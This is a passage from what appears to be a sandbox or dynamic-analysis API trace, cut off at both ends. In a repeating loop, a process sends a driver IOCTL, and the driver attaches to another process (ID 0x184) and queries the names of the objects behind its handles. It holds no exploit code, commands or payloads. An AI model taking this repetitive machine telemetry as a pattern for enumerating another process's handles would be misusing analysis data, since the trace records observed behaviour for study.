ObjectNameInfo=0xfffffa8002f63044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.579] ObfDereferenceObject (Object=0xfffff8a0044997a0) returned 0x2 [0132.579] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.579] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.579] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.579] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0132.580] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.580] PsAcquireProcessExitSynchronization () returned 0x0 [0132.580] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.580] ObReferenceObjectByHandle (in: Handle=0xb4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800358d580, HandleInformation=0x0) returned 0x0 [0132.580] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.580] PsReleaseProcessExitSynchronization () returned 0x2 [0132.580] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.580] ObQueryNameString (in: Object=0xfffffa800358d580, ObjectNameInfo=0xfffffa8002f79344, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f79344, ReturnLength=0xfffff88005163550) returned 0x0 [0132.580] ObfDereferenceObject (Object=0xfffffa800358d580) returned 0x2 [0132.580] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.580] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.580] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.580] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0132.580] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.580] PsAcquireProcessExitSynchronization () returned 0x0 [0132.580] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.580] ObReferenceObjectByHandle (in: Handle=0xb8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036e58e0, HandleInformation=0x0) returned 0x0 [0132.580] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.580] PsReleaseProcessExitSynchronization () returned 0x2 [0132.580] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.580] ObQueryNameString (in: Object=0xfffffa80036e58e0, ObjectNameInfo=0xfffffa8002f5e044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f5e044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.580] ObfDereferenceObject (Object=0xfffffa80036e58e0) returned 0x2 [0132.580] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.581] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.581] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.581] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0132.581] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.581] PsAcquireProcessExitSynchronization () returned 0x0 [0132.581] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.581] ObReferenceObjectByHandle (in: Handle=0xc0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002912a20, HandleInformation=0x0) returned 0x0 [0132.581] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.581] PsReleaseProcessExitSynchronization () returned 0x2 [0132.581] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.581] ObQueryNameString (in: Object=0xfffffa8002912a20, ObjectNameInfo=0xfffffa80028c56c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80028c56c4, ReturnLength=0xfffff88005163550) returned 0x0 [0132.581] ObfDereferenceObject (Object=0xfffffa8002912a20) returned 0x2 [0132.581] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.581] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.581] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.581] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0132.581] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.581] PsAcquireProcessExitSynchronization () returned 0x0 [0132.581] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.581] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800356df20, HandleInformation=0x0) returned 0x0 [0132.581] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.581] PsReleaseProcessExitSynchronization () returned 0x2 [0132.581] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.582] ObQueryNameString (in: Object=0xfffffa800356df20, ObjectNameInfo=0xfffffa80029637c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80029637c4, ReturnLength=0xfffff88005163550) returned 0x0 [0132.582] ObfDereferenceObject (Object=0xfffffa800356df20) returned 0x2 [0132.582] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.582] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.582] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.582] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.582] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.582] PsAcquireProcessExitSynchronization () returned 0x0 [0132.582] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.582] ObReferenceObjectByHandle (in: Handle=0xd0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0013db060, HandleInformation=0x0) returned 0x0 [0132.582] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.582] PsReleaseProcessExitSynchronization () returned 0x2 [0132.582] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.582] ObQueryNameString (in: Object=0xfffff8a0013db060, ObjectNameInfo=0xfffffa8002f06044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f06044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.582] ObfDereferenceObject (Object=0xfffff8a0013db060) returned 0x1 [0132.583] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.583] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.583] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.583] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.583] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.583] PsAcquireProcessExitSynchronization () returned 0x0 [0132.583] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.583] ObReferenceObjectByHandle (in: Handle=0xe4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0012de480, HandleInformation=0x0) returned 0x0 [0132.583] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.583] PsReleaseProcessExitSynchronization () returned 0x2 [0132.583] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.583] ObQueryNameString (in: Object=0xfffff8a0012de480, ObjectNameInfo=0xfffffa8002f2d044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f2d044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.583] ObfDereferenceObject (Object=0xfffff8a0012de480) returned 0x1 [0132.583] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.583] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.583] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.583] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0132.583] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.583] PsAcquireProcessExitSynchronization () returned 0x0 [0132.583] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.583] ObReferenceObjectByHandle (in: Handle=0xe8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800379d920, HandleInformation=0x0) returned 0x0 [0132.584] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.584] PsReleaseProcessExitSynchronization () returned 0x2 [0132.584] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.584] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8002f5d044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f5d044, ReturnLength=0xfffff88005163508) returned 0x0 [0132.584] ObfDereferenceObject (Object=0xfffffa800379d920) returned 0x1 [0132.584] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.584] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.584] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.584] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.584] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.584] PsAcquireProcessExitSynchronization () returned 0x0 [0132.584] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.584] ObReferenceObjectByHandle (in: Handle=0xf4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000c49060, HandleInformation=0x0) returned 0x0 [0132.584] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.584] PsReleaseProcessExitSynchronization () returned 0x2 [0132.584] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.584] ObQueryNameString (in: Object=0xfffff8a000c49060, ObjectNameInfo=0xfffffa800289c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800289c044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.584] ObfDereferenceObject (Object=0xfffff8a000c49060) returned 0x1 [0132.584] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.584] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.584] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.585] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.585] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.585] PsAcquireProcessExitSynchronization () returned 0x0 [0132.585] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.585] ObReferenceObjectByHandle (in: Handle=0xf8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000c4a5e0, HandleInformation=0x0) returned 0x0 [0132.585] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.585] PsReleaseProcessExitSynchronization () returned 0x2 [0132.585] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.585] ObQueryNameString (in: Object=0xfffff8a000c4a5e0, ObjectNameInfo=0xfffffa8002f5b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f5b044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.585] ObfDereferenceObject (Object=0xfffff8a000c4a5e0) returned 0x1 [0132.585] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.585] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.585] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.585] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.585] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.585] PsAcquireProcessExitSynchronization () returned 0x0 [0132.585] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.585] ObReferenceObjectByHandle (in: Handle=0xfc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000c4b330, HandleInformation=0x0) returned 0x0 [0132.585] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.585] PsReleaseProcessExitSynchronization () returned 0x2 [0132.585] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.585] ObQueryNameString (in: Object=0xfffff8a000c4b330, ObjectNameInfo=0xfffffa8002f57044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f57044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.586] ObfDereferenceObject (Object=0xfffff8a000c4b330) returned 0x1 [0132.586] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.586] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.586] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.586] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.586] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.586] PsAcquireProcessExitSynchronization () returned 0x0 [0132.586] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.586] ObReferenceObjectByHandle (in: Handle=0x100, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000c4b6d0, HandleInformation=0x0) returned 0x0 [0132.586] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.586] PsReleaseProcessExitSynchronization () returned 0x2 [0132.586] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.586] ObQueryNameString (in: Object=0xfffff8a000c4b6d0, ObjectNameInfo=0xfffffa8002f55044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f55044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.586] ObfDereferenceObject (Object=0xfffff8a000c4b6d0) returned 0x1 [0132.586] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.586] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.586] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.586] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.586] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.586] PsAcquireProcessExitSynchronization () returned 0x0 [0132.586] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.586] ObReferenceObjectByHandle (in: Handle=0x104, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0011f3c50, HandleInformation=0x0) returned 0x0 [0132.587] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.587] PsReleaseProcessExitSynchronization () returned 0x2 [0132.587] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.587] ObQueryNameString (in: Object=0xfffff8a0011f3c50, ObjectNameInfo=0xfffffa8002893044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002893044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.587] ObfDereferenceObject (Object=0xfffff8a0011f3c50) returned 0x1 [0132.587] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.587] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.587] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.587] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.587] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.587] PsAcquireProcessExitSynchronization () returned 0x0 [0132.587] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.587] ObReferenceObjectByHandle (in: Handle=0x108, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000c6e410, HandleInformation=0x0) returned 0x0 [0132.587] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.587] PsReleaseProcessExitSynchronization () returned 0x2 [0132.587] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.587] ObQueryNameString (in: Object=0xfffff8a000c6e410, ObjectNameInfo=0xfffffa8002877044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002877044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.587] ObfDereferenceObject (Object=0xfffff8a000c6e410) returned 0x1 [0132.587] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.587] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.587] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.587] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.588] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.588] PsAcquireProcessExitSynchronization () returned 0x0 [0132.588] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.588] ObReferenceObjectByHandle (in: Handle=0x110, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000c4eed0, HandleInformation=0x0) returned 0x0 [0132.588] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.588] PsReleaseProcessExitSynchronization () returned 0x2 [0132.588] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.588] ObQueryNameString (in: Object=0xfffff8a000c4eed0, ObjectNameInfo=0xfffffa8002540344, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002540344, ReturnLength=0xfffff88005163550) returned 0x0 [0132.588] ObfDereferenceObject (Object=0xfffff8a000c4eed0) returned 0x1 [0132.588] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.588] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.588] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.588] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.588] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.588] PsAcquireProcessExitSynchronization () returned 0x0 [0132.588] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.588] ObReferenceObjectByHandle (in: Handle=0x11c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000c80fc0, HandleInformation=0x0) returned 0x0 [0132.588] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.588] PsReleaseProcessExitSynchronization () returned 0x2 [0132.588] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.588] ObQueryNameString (in: Object=0xfffff8a000c80fc0, ObjectNameInfo=0xfffffa8002689044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002689044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.589] ObfDereferenceObject (Object=0xfffff8a000c80fc0) returned 0x1 [0132.589] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.589] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.589] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.589] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, 